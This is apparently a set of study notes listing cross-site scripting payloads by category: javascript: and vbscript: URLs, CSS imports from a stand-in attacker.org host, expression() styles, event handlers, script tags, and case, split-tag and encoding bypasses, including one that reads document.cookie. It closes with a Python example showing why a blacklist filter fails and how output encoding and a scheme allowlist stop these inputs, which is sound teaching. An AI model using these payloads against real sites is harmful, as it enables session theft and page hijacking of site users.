1.5 XSS Payload
Category 1: JavaScript URL
<a href="javascript:alert('test')">link</a>
<a href="javascript:alert('xss')">link</a>
<a href='vbscript:MsgBox("XSS")'>link</a>
<a href="vbscript:alert(1)">Hello</a>
Category 2: CSS import
<style>@import url("http://attacker.org/malicious.css");</style>
<style>@imp\ort url("http://attacker.org/malicious.css");</style>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<STYLE>@import'http://jb51.net/xss.css';</STYLE>
Category 3: Inline style
<div style="color: expression(alert('XSS'))">
<div style=color:expression\(alert(1))></div>
<div style="color: '<'; color: expression(alert('XSS'))">
<div style=X:expression(alert(/xss/))>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">
Category 4: JavaScript event handlers
<div onclick="alert('xss')">
<div onmouseenter="alert('xss')">
<div onclick ="alert('xss')">
<BODY ONLOAD=alert('XSS')>
<img src=1 onerror=alert(1)>
<img/src='1'/onerror=alert(0)>
Category 5: Script tag
<script src="http://baidu.com"></script>
<script>alert("XSS")</script>
<scr<script>ipt>alert("XSS")</scr<script>ipt>
<SCRIPT>a=/XSS/;alert(a.source)</SCRIPT>
<script>alert(/1/.source)</script>
<script>alert(1);</script>
Try them one at a time and reason about why each one works or fails.
Variants to consider: DOM-based, stored, reflected; case-variation bypass, blacklist bypass, encoding bypass, onclick event bypass.
Keywords: closing characters, alert, script, <>, ', ", (), URL encoding, ASCII/decimal conversion.
<script>alert(1)</script>
alert(/xss/)
";alert(/xss/)//
"><script>alert('xss')</script><"
<script>alert(document.cookie)</script>
<Script>alert("ANY")</Script>
"> <Script>alert('handsome boy')</script> //
<scr<script>ipt>alert("ANY")</scr</script>ipt>
<img src=1 onerror=alert("ANY")>
"> <scscriptript>alert`xss`</scscriptript> //
oninput=alert`1`
<a href="x" onclick="alert(/xss/)">test</a>
"<script>alert('xss')</script>"
" onchange='alert(1)' "
<script>AlerT("ANY")</script>
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 65, 78, 89, 34, 41))</script>
"> <a href="javascript:%61lert(1)">click me</a> //
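An added defensive example, not part of the original notes, showing why the case-variant and split-tag payloads above defeat a single-pass blacklist filter, and how contextual output encoding plus an href scheme allowlist neutralize them instead. The payload strings and the helper names are constructed for this illustration.

```python
import html
import re
from urllib.parse import unquote

# Constructed inputs: filter-bypass payloads from the list above, used as test data.
SPLIT_TAG_PAYLOAD = '<scr<script>ipt>alert("XSS")</scr<script>ipt>'
CASE_PAYLOAD = '<Script>alert("ANY")</Script>'
ATTR_BREAKOUT_PAYLOAD = '"><script>alert(\'xss\')</script><"'

_SCRIPT_TAG_RE = re.compile(r'</?script>')            # case-sensitive, single pass
_LIVE_SCRIPT_RE = re.compile(r'<script\b', re.IGNORECASE)


def naive_strip_script(value: str) -> str:
    """A blacklist filter of the kind the split-tag and case-variant payloads defeat:
    one case-sensitive pass that deletes the literal strings <script> and </script>."""
    return _SCRIPT_TAG_RE.sub('', value)


def contains_live_script_tag(markup: str) -> bool:
    """True if the string still holds a tag a browser would parse as <script>."""
    return _LIVE_SCRIPT_RE.search(markup) is not None


def encode_for_html(value: str) -> str:
    """Contextual output encoding for a text node or a quoted attribute value.
    Each of < > & " ' becomes an entity, so no closing character or tag survives."""
    return html.escape(value, quote=True)


SAFE_SCHEMES = frozenset({'http', 'https', 'mailto'})
_SCHEME_RE = re.compile(r'^([a-z][a-z0-9+.\-]*):', re.IGNORECASE)


def is_safe_href(url: str) -> bool:
    """Scheme allowlist for href/src values. Decodes HTML entities and percent-encoding
    and drops ASCII control/whitespace characters (which browsers ignore inside a URL)
    before reading the scheme, so javascript:/vbscript: variants are rejected."""
    decoded = unquote(html.unescape(url))
    cleaned = re.sub(r'[\x00-\x20]', '', decoded)
    match = _SCHEME_RE.match(cleaned)
    if match is None:
        return True                       # no scheme at all: a relative URL
    return match.group(1).lower() in SAFE_SCHEMES
```

The blacklist reassembles a working tag from the split payload and ignores the mixed-case one, while the encoded output contains no live tag and the allowlist rejects every scheme variant regardless of case, whitespace or encoding.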